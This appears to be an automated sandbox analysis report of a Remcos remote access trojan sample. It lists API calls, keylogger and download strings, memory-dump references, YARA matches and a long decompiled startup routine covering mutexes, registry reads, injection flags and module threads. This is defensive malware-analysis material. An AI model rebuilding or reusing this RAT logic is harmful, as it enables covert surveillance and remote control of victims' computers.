                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00414646
                      • SHCreateMemStream.SHLWAPI(00000000), ref: 0041469C
                        • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Create$Stream$Compatibleclosesocket
                      • String ID: image/jpeg

                      APIs
                        • Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97
                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
                      • GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CodeInfoPageValid
                      • String ID: :rD

                      APIs
                      • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Info
                      • String ID: $vuD

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167
                        • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,7519FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                        • Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
                        • Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A
                        • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                      • Sleep.KERNEL32(000000FA,0045F464), ref: 00404239
                      Strings
                      • /sort "Visit Time" /stext ", xrefs: 004041B3
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                      • String ID: /sort "Visit Time" /stext "

                      APIs
                      • Sleep.KERNEL32(00000064), ref: 00412A88
                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 00412AEA
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: DownloadFileSleep
                      • String ID: 8E@

                      APIs
                      • UnhookWindowsHookEx.USER32(?), ref: 0040961F
                        • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                        • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                        • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: EventHookLocalTimeUnhookWindowswsprintf
                      • String ID: Offline Keylogger Stopped$[Info]

                      APIs
                      • IsValidLocale.KERNEL32(00000000,?C,00000000,00000001,?,?,0043E33F,?,?,0043DD1F,?,00000004), ref: 004425FF
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: LocaleValid
                      • String ID: ?C$IsValidLocaleName

                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00412795
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ExecuteShell
                      • String ID: 8E@$open

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: wave$CloseStop
                      • String ID: 8E@

                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
                      • IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
                      • SetLastError.KERNEL32(0000007F), ref: 0040F619
                      • SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ErrorLastRead
                      • String ID:

                      Executed Functions

                      Non-executed Functions

                      Memory Dump Source
                      • Source File: 00000013.00000003.337217463.00000000032F4000.00000004.00000001.sdmp, Offset: 032F4000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: l.@$p.@$p.@$3C

                      Executed Functions

                      C-Code - Quality: 100%
                      			E0077CB4E(int _a4) {
                      				void* _t14;
                      				void* _t16;
                      
                      				if(E00782796(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                      					TerminateProcess(GetCurrentProcess(), _a4);
                      				}
                      				E0077CB8F(_t14, _t16, _a4);
                      				ExitProcess(_a4);
                      			}

                      APIs
                      • GetCurrentProcess.KERNEL32(0000000C,?,0077CB24,0000000C,007A8188,0000000C), ref: 0077CB6F
                      • TerminateProcess.KERNEL32(00000000,?,0077CB24,0000000C,007A8188,0000000C), ref: 0077CB76
                      • ExitProcess.KERNEL32 ref: 0077CB88
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:

                      C-Code - Quality: 100%
                      			E0076F8B9() {
                      				_Unknown_base(*)()* _t1;
                      
                      				_t1 = SetUnhandledExceptionFilter(E0076F8C5); // executed
                      				return _t1;
                      			}

                      APIs
                      • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0076F5A8), ref: 0076F8BE
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:

                      C-Code - Quality: 89%
                      			E0074C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
                      				char _v524;
                      				char _v700;
                      				char _v720;
                      				char _v724;
                      				char _v728;
                      				char _v744;
                      				char _v756;
                      				char _v760;
                      				char _v772;
                      				struct _SECURITY_ATTRIBUTES* _v776;
                      				signed int _v780;
                      				char _v784;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t71;
                      				void* _t78;
                      				void** _t86;
                      				void* _t90;
                      				CHAR* _t93;
                      				long _t95;
                      				int _t97;
                      				char _t100;
                      				void* _t101;
                      				void* _t105;
                      				void* _t121;
                      				void* _t122;
                      				void* _t129;
                      				char _t135;
                      				char* _t137;
                      				signed char* _t139;
                      				signed char* _t141;
                      				void* _t144;
                      				void* _t146;
                      				void* _t163;
                      				intOrPtr _t165;
                      				void* _t166;
                      				intOrPtr _t182;
                      				intOrPtr* _t185;
                      				void* _t187;
                      				void* _t193;
                      				char* _t196;
                      				void* _t199;
                      				char* _t203;
                      				void* _t210;
                      				signed short* _t214;
                      				void* _t215;
                      				void* _t216;
                      				signed int _t217;
                      				CHAR* _t224;
                      				void* _t226;
                      				char* _t229;
                      				char* _t231;
                      				intOrPtr* _t233;
                      				void* _t235;
                      				intOrPtr* _t240;
                      				intOrPtr* _t244;
                      				void* _t246;
                      				void* _t254;
                      				void* _t265;
                      				void* _t268;
                      				struct _SECURITY_ATTRIBUTES* _t269;
                      				int _t272;
                      				char* _t360;
                      				signed int _t382;
                      				signed int _t386;
                      				int _t388;
                      				signed int _t394;
                      				signed int _t397;
                      				intOrPtr _t423;
                      				void* _t433;
                      				void* _t435;
                      				signed int _t452;
                      				void* _t455;
                      				char* _t461;
                      				void* _t462;
                      				char* _t465;
                      				void* _t467;
                      				void* _t472;
                      				char* _t477;
                      				intOrPtr* _t481;
                      				void* _t484;
                      				void* _t485;
                      				void* _t486;
                      				signed int _t492;
                      				void* _t495;
                      				void* _t496;
                      				void* _t497;
                      				void* _t499;
                      				void* _t501;
                      				void* _t502;
                      				void* _t506;
                      
                      				_t444 = __edx;
                      				 *0x7abd28 = _a4;
                      				_push(_t268);
                      				E0074CC55( &_v724, __edx, __eflags);
                      				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
                      				E007420EC(_t268, _t495, __edx, __eflags, 0x7ac59c);
                      				_t496 = _t495 - 0x18;
                      				E007420EC(_t268, _t496, __edx, __eflags,  &_v728);
                      				_t71 = E00757478( &_v756, __edx);
                      				_t497 = _t496 + 0x30;
                      				E0074D458(__edx, _t71);
                      				E00741E74( &_v760, __edx);
                      				_t284 = _a12;
                      				if( *_a12 != 0x2d) {
                      					L6:
                      					_t461 = 0x7ac578;
                      					__eflags =  *((char*)(E00741F95(E00741E49(0x7ac578, _t444, __eflags, 3))));
                      					 *0x7abb01 = __eflags != 0;
                      					_t78 = E00745343(_t268,  &_v756, E007475E6( &_v780, "Software\\", __eflags, E00741E49(0x7ac578, _t444, __eflags, 0xe)), 0x7ac578, __eflags, "\\");
                      					_t471 = 0x7ac518;
                      					E00741FD1(0x7ac518, _t77, 0x7ac518, _t78);
                      					E00741FC7();
                      					E00741FC7();
                      					E00745A0B(_t268, 0x7ac5cc, "Exe");
                      					_t269 = 0;
                      					E00741E49(0x7ac578, _t77, __eflags, 0x32);
                      					__eflags =  *(E00745220(0));
                      					 *0x7abd4e = __eflags != 0;
                      					E00741E49(0x7ac578, _t77, __eflags, 0x33);
                      					_t86 = E00745220(0);
                      					__eflags =  *_t86;
                      					 *0x7abd4f =  *_t86 != 0;
                      					__eflags =  *0x7abd4e - _t269; // 0x0
                      					if(__eflags == 0) {
                      						L8:
                      						_v776 = _t269;
                      						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
                      						__eflags = _t472;
                      						if(_t472 != 0) {
                      							WaitForSingleObject(_t472, 0xea60);
                      							CloseHandle(_t472);
                      						}
                      						_t447 = E00741F95(0x7ac518); // executed
                      						_t90 = E00750885(_t89, "Inj",  &_v776); // executed
                      						__eflags = _t90;
                      						if(__eflags != 0) {
                      							_t447 = E00741F95(0x7ac518);
                      							E00750CE2(_t259, __eflags, "Inj");
                      						}
                      						E00741FAD(0x7ac548, E00741E49(_t461, _t447, __eflags, 0xe));
                      						_t93 = E00741F95(0x7ac548);
                      						_t462 = 0;
                      						_t272 = 1;
                      						CreateMutexA(0, 1, _t93); // executed
                      						_t95 = GetLastError();
                      						__eflags = _t95 - 0xb7;
                      						if(_t95 == 0xb7) {
                      							L45:
                      							E00741FC7();
                      							_t97 = _t272;
                      							goto L5;
                      						} else {
                      							E0074CD09();
                      							GetModuleFileNameW(0, 0x7abb08, 0x104);
                      							_t100 = E00757614(0x7ac548);
                      							_push(0x7ac548);
                      							_t448 = 0x80000002;
                      							 *0x7abeb4 = _t100;
                      							_t101 = E007508E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
                      							_t499 = _t497 + 0xc;
                      							E00741FD1(0x7ac5b4, 0x80000002, 0x7ac5b4, _t101);
                      							E00741FC7();
                      							__eflags =  *0x7abeb4;
                      							if( *0x7abeb4 == 0) {
                      								_push(" (32 bit)");
                      							} else {
                      								_push(" (64 bit)");
                      							}
                      							E00745A02(_t272, 0x7ac5b4, _t462);
                      							_t105 =  *0x7abd20; // 0x0
                      							__eflags = _t105;
                      							if(_t105 != 0) {
                      								 *0x7aa9d0 =  *_t105();
                      							}
                      							_t477 = 0x7ac578;
                      							__eflags = _v776 - _t462;
                      							if(__eflags == 0) {
                      								_t433 = E00741E49(0x7ac578, _t448, __eflags, 0x2e);
                      								__eflags =  *((char*)(E00741F95(_t433)));
                      								if(__eflags != 0) {
                      									__eflags =  *0x7abd20 - _t462; // 0x0
                      									if(__eflags != 0) {
                      										__eflags =  *0x7aa9d0 - _t462; // 0x2
                      										if(__eflags == 0) {
                      											_t448 = E00741F95(0x7ac518);
                      											_t254 = E0075083B(0x7ac518, _t253, "origmsc");
                      											_pop(_t435);
                      											__eflags = _t254;
                      											if(__eflags == 0) {
                      												E00745F77(_t272, _t435, _t448);
                      											}
                      										} else {
                      											_push(_t433);
                      											_push(_t433);
                      											__eflags = E0074A713() - 0xffffffff;
                      											if(__eflags == 0) {
                      												E00746071(__eflags);
                      											}
                      										}
                      									}
                      								}
                      							}
                      							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 0x27))));
                      							if(__eflags != 0) {
                      								E0074D3F7();
                      							}
                      							E00749DC9(_t272, 0x7ac4e8, E00741F95(E00741E49(_t477, _t448, __eflags, 0xb)));
                      							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 4))));
                      							 *0x7abb02 = __eflags != 0;
                      							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 5))));
                      							 *0x7abafb = __eflags != 0;
                      							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 8))));
                      							 *0x7abb00 = __eflags != 0;
                      							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 3))));
                      							if(__eflags != 0) {
                      								_t240 = E00741F95(E00741E49(_t477, _t448, __eflags, 0x30));
                      								_t25 = _t240 + 2; // 0x2
                      								_t448 = _t25;
                      								do {
                      									_t423 =  *_t240;
                      									_t240 = _t240 + 2;
                      									__eflags = _t423 - _t462;
                      								} while (_t423 != _t462);
                      								__eflags = _t240 - _t448;
                      								if(__eflags != 0) {
                      									_t244 = E00741F95(E00741E49(_t477, _t448, __eflags, 9));
                      									_t246 = E00741F95(E00741E49(0x7ac578, _t448, __eflags, 0x30));
                      									_t448 =  *_t244;
                      									E00741EFA(0x7ac530,  *_t244, _t244, E0075805B( &_v780,  *_t244, _t246));
                      									E00741EF0();
                      									_t477 = 0x7ac578;
                      								}
                      							}
                      							__eflags = _v776 - _t462;
                      							if(_v776 != _t462) {
                      								E00771F00(_t462,  &_v524, _t462, 0x208);
                      								_t121 = E00742489();
                      								_t122 = E00741F95(0x7ac560);
                      								_t449 = E00741F95(0x7ac518);
                      								E00750A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
                      								_t501 = _t499 + 0x20;
                      								E00749DC9(_t272, 0x7ac500,  &_v524);
                      								_t465 = 0x7ac578;
                      								goto L47;
                      							} else {
                      								__eflags =  *0x7abb01;
                      								if(__eflags == 0) {
                      									E00749DC9(_t272, 0x7ac500, 0x7abb08);
                      								} else {
                      									_t229 = E00741F95(E00741E49(_t477, _t448, __eflags, 0x1e));
                      									_t231 = E00741F95(E00741E49(_t477, _t448, __eflags, 0xc));
                      									_t233 = E00741F95(E00741E49(0x7ac578, _t448, __eflags, 9));
                      									__eflags =  *_t229;
                      									__eflags =  *_t231;
                      									_t477 = 0x7ac578;
                      									_t235 = E00741F95(E00741E49(0x7ac578, _t448,  *_t231, 0xa));
                      									E0074A987( *_t233, E00741F95(E00741E49(0x7ac578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
                      									_t499 = _t499 + 0xc;
                      									_t272 = 1;
                      									_t462 = 0;
                      								}
                      								_t210 = E00742489();
                      								_t452 = 2;
                      								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
                      								_push(_t394);
                      								_v780 = _t394;
                      								_t486 = E0076F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
                      								__eflags = _t486;
                      								if(_t486 == 0) {
                      									_t486 = _t462;
                      								} else {
                      									E00771F00(_t462, _t486, _t462, _v780);
                      									_t499 = _t499 + 0xc;
                      								}
                      								_t214 = E00741EEB(0x7ac500);
                      								_t455 = _t486 - _t214;
                      								__eflags = _t455;
                      								_t467 = 2;
                      								do {
                      									_t397 =  *_t214 & 0x0000ffff;
                      									 *(_t214 + _t455) = _t397;
                      									_t214 = _t214 + _t467;
                      									__eflags = _t397;
                      								} while (_t397 != 0);
                      								_push(_t397);
                      								_t215 = E00742489();
                      								_t216 = E00741F95(0x7ac560);
                      								_t217 = E00742489();
                      								E00750C80(E00741F95(0x7ac518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215);
                      								E0076F4CF(_t486);
                      								_t501 = _t499 + 0x1c;
                      								_t465 = 0x7ac578;
                      								E00741E49(0x7ac578, _t219, __eflags, 0xd);
                      								_t449 = "0";
                      								__eflags = E0074EAD9(__eflags);
                      								if(__eflags == 0) {
                      									L47:
                      									_push(_t272);
                      									_t129 = E00741F95(E00741E49(_t465, _t449, __eflags, 0x34));
                      									_t502 = _t501 - 0x18;
                      									E00742084(_t272, _t502, _t129);
                      									_push("licence");
                      									_t450 = E00741F95(0x7ac518);
                      									E00750AA7(0x7ac518, _t131);
                      									_t497 = _t502 + 0x20;
                      									_t135 = E00776769(_t133, E00741F95(E00741E49(_t465, _t131, __eflags, 0x28)));
                      									 *0x7abb03 = _t135;
                      									__eflags = _t135 - 2;
                      									if(_t135 != 2) {
                      										__eflags = _t135 - _t272;
                      										if(__eflags == 0) {
                      											_t388 = 0;
                      											__eflags = 0;
                      											goto L51;
                      										}
                      									} else {
                      										_t388 = _t272;
                      										L51:
                      										E00758F59(_t272, _t388, _t450);
                      										__eflags = 0;
                      										CreateThread(0, 0, E00758D28, 0, 0, 0);
                      									}
                      									_t137 = E00741F95(E00741E49(_t465, _t450, __eflags, 0x37));
                      									_t139 = E00741F95(E00741E49(_t465, _t450, __eflags, 0x10));
                      									_t141 = E00741F95(E00741E49(_t465, _t450, __eflags, 0xf));
                      									__eflags =  *_t137;
                      									_t471 = 0x7ac578;
                      									_t144 = E00776769(_t142, E00741F95(E00741E49(0x7ac578, _t450,  *_t137, 0x36)));
                      									_t146 = E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x11));
                      									E0074846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
                      									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x14)))) - 1;
                      									if(__eflags != 0) {
                      										_t461 = CreateThread;
                      									} else {
                      										_t199 = 2;
                      										_t485 = E0076F218(_t450, 0x7ac578, __eflags, _t199);
                      										 *_t485 = 0;
                      										_t386 = E00741E49(0x7ac578, _t450, __eflags, 0x35);
                      										_t203 = E00741F95(_t386);
                      										_t461 = CreateThread;
                      										__eflags =  *_t203;
                      										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
                      										CreateThread(0, 0, E00755938, _t485, 0, 0);
                      										_t471 = 0x7ac578;
                      									}
                      									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(_t471, _t450, __eflags, 0x16)))) - 1;
                      									if(__eflags == 0) {
                      										_t193 = 2;
                      										_t484 = E0076F218(_t450, _t471, __eflags, _t193);
                      										 *_t484 = 1;
                      										_t382 = E00741E49(0x7ac578, _t450, __eflags, 0x35);
                      										_t196 = E00741F95(_t382);
                      										__eflags =  *_t196;
                      										__eflags = 0;
                      										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
                      										CreateThread(0, 0, E00755938, _t484, 0, 0);
                      										_t471 = 0x7ac578;
                      									}
                      									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(_t471, _t450, __eflags, 0x23)))) - 1;
                      									if(__eflags == 0) {
                      										 *0x7aba75 = 1;
                      										_t185 = E00741F95(E00741E49(_t471, _t450, __eflags, 0x25));
                      										_t187 = E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x26));
                      										_t450 =  *_t185;
                      										E00741EFA(0x7ac0e0,  *_t185, _t185, E0075800F( &_v780,  *_t185, _t187));
                      										E00741EF0();
                      										__eflags = 0;
                      										CreateThread(0, 0, E00741BCD, 0, 0, 0);
                      										_t471 = 0x7ac578;
                      									}
                      									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(_t471, _t450, __eflags, 0x2b)))) - 1;
                      									if(__eflags == 0) {
                      										_t471 = E00741F95(E00741E49(_t471, _t450, __eflags, 0x2c));
                      										_t182 = E00776769(_t180, E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x2d)));
                      										__eflags =  *_t471;
                      										_t450 = _t182;
                      										__eflags =  *_t471 != 0;
                      										E0074A679(_t182);
                      									}
                      									E00741EFA(0x7ac584, _t450, _t471, E00756D9E( &_v772, _t461, __eflags));
                      									_t360 =  &_v776;
                      									E00741EF0();
                      									_t163 =  *0x7abd14; // 0x0
                      									_t269 = 0;
                      									__eflags = _t163;
                      									if(_t163 != 0) {
                      										 *_t163(0);
                      									}
                      									CreateThread(_t269, _t269, E0074D0B5, _t269, _t269, _t269);
                      									__eflags =  *0x7abd4e;
                      									if( *0x7abd4e != 0) {
                      										CreateThread(_t269, _t269, E0074FAC7, _t269, _t269, _t269);
                      									}
                      									__eflags =  *0x7abd4f;
                      									if( *0x7abd4f != 0) {
                      										CreateThread(_t269, _t269, E0074FFE5, _t269, _t269, _t269);
                      									}
                      									_t165 =  *0x7aa9d0; // 0x2
                      									_t166 = _t165 - _t269;
                      									__eflags = _t166;
                      									if(__eflags == 0) {
                      										goto L71;
                      									} else {
                      										__eflags = _t166 - 1;
                      										if(__eflags == 0) {
                      											_push("Administrator");
                      											goto L72;
                      										}
                      									}
                      									goto L73;
                      								} else {
                      									_t224 = E00741E49(0x7ac578, "0", __eflags, 0xd);
                      									_t506 = _t501 - 0x18;
                      									_t449 = _t224;
                      									E007572DA(_t506, _t224);
                      									_t226 = E0074CE44(__eflags);
                      									_t501 = _t506 + 0x18;
                      									__eflags = _t226 - _t272;
                      									if(__eflags != 0) {
                      										goto L47;
                      									} else {
                      										_t272 = 3;
                      										goto L45;
                      									}
                      								}
                      							}
                      						}
                      					} else {
                      						_v780 = 0;
                      						_t265 = E00750885(E00741F95(0x7ac518), "WD",  &_v780);
                      						__eflags = _t265;
                      						if(_t265 != 0) {
                      							E00750CE2(E00741F95(0x7ac518), __eflags, "WD");
                      							E0074FD95();
                      							L71:
                      							_push("User");
                      							L72:
                      							E007475C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00742084(_t269,  &_v776));
                      							E00742084(_t269, _t497 - 4, "[Info]");
                      							E00756C80(_t269, _t461);
                      							_t360 =  &_v784;
                      							E00741FC7();
                      							L73:
                      							E00751929();
                      							asm("int3");
                      							_push(_t471);
                      							_t481 = _t360 + 0x68;
                      							E0074D515(_t481, __eflags);
                      							_t284 = _t481;
                      							 *_t284 = 0x7a0788;
                      							 *_t284 = 0x7a0744;
                      							return E007704F6(_t284);
                      						} else {
                      							goto L8;
                      						}
                      					}
                      				} else {
                      					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                      					if(__eflags != 0) {
                      						goto L6;
                      					} else {
                      						__eax =  *(__ecx + 2) & 0x000000ff;
                      						__eflags = __al;
                      						if(__eflags != 0) {
                      							goto L6;
                      						} else {
                      							_push(__ecx);
                      							_push(__ecx);
                      							__ecx =  &_v700;
                      							__eax = E0074D544( &_v700, __edx, __eflags, "license_code.txt", 2);
                      							__ecx = 0x7ac578;
                      							__ecx = E00741E49(0x7ac578, __edx, __eflags, 0x34);
                      							__edx = __eax;
                      							__ecx =  &_v720;
                      							__eax = E0074E8BB( &_v720, __edx, __eflags);
                      							__ecx =  &_v720;
                      							__eax = E0074D4F5( &_v720, __edx, __eflags);
                      							__ecx =  &_v720;
                      							L74();
                      							__ecx =  &_v744;
                      							E00741FC7() = 0;
                      							__eax = 1;
                      							__eflags = 1;
                      							L5:
                      							return _t97;
                      						}
                      					}
                      				}
                      			}

                      APIs
                      • OpenMutexA.KERNEL32 ref: 0074C471
                      • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0074C483
                      • CloseHandle.KERNEL32(00000000), ref: 0074C48A
                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0074C4E9
                      • GetLastError.KERNEL32 ref: 0074C4EF
                      • GetModuleFileNameW.KERNEL32(00000000,007ABB08,00000104), ref: 0074C510
                        • Part of subcall function 0074E8BB: __EH_prolog.LIBCMT ref: 0074E8C0
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                      • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Exe$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                      • API String ID: 1247502528-2513554630
                      • Opcode ID: 598a5279ada0e75b3ab8f866b0a23ce3b8e235a70aa2e167de83890c7a52d38e
                      • Instruction ID: 16ed777f92c2ca2f3ee3bf521df295b57d2c35748f7d33c32af11898b5cf1b76
                      • Opcode Fuzzy Hash: 598a5279ada0e75b3ab8f866b0a23ce3b8e235a70aa2e167de83890c7a52d38e
                      • Instruction Fuzzy Hash: 7732D790B45350EBDB1AB7705C2FB7E29898BC6700F94093AF541AB2D3EF6C5D868361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00750885(char* __edx, char* _a4, char* _a8) {
                      				void* _v8;
                      				int _v12;
                      				int _v16;
                      				int _t12;
                      				long _t14;
                      				long _t18;
                      
                      				_t12 = 4;
                      				_v12 = _t12;
                      				_v16 = _t12;
                      				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                      				if(_t14 != 0) {
                      					return 0;
                      				}
                      				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
                      				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
                      			}

                      APIs
                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 007508A5
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 007508C3
                      • RegCloseKey.ADVAPI32(?), ref: 007508CE
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID:
                      • API String ID: 3677997916-0
                      • Opcode ID: 9c551670ad6f5bccfaaf7f2264a81e30767596394b984149d0f83b68cf5c94e9
                      • Instruction ID: d3544b9ec0dfc31a47956495bff898a56a0ab402b36938ebd6b1b7d70343fea0
                      • Opcode Fuzzy Hash: 9c551670ad6f5bccfaaf7f2264a81e30767596394b984149d0f83b68cf5c94e9
                      • Instruction Fuzzy Hash: F6F06D7690020CBFDF109FA49C05FEEBBBCEB04701F1081A2FE04E6150E2745B149B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlExitUserThread.NTDLL(00000000), ref: 006B0023
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416194152.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false
                      Similarity
                      • API ID: ExitThreadUser
                      • String ID:
                      • API String ID: 3424019298-0
                      • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                      • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                      • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                      • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlExitUserThread.NTDLL(00000000), ref: 00730023
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416234464.0000000000730000.00000040.00000001.sdmp, Offset: 00730000, based on PE: false
                      Similarity
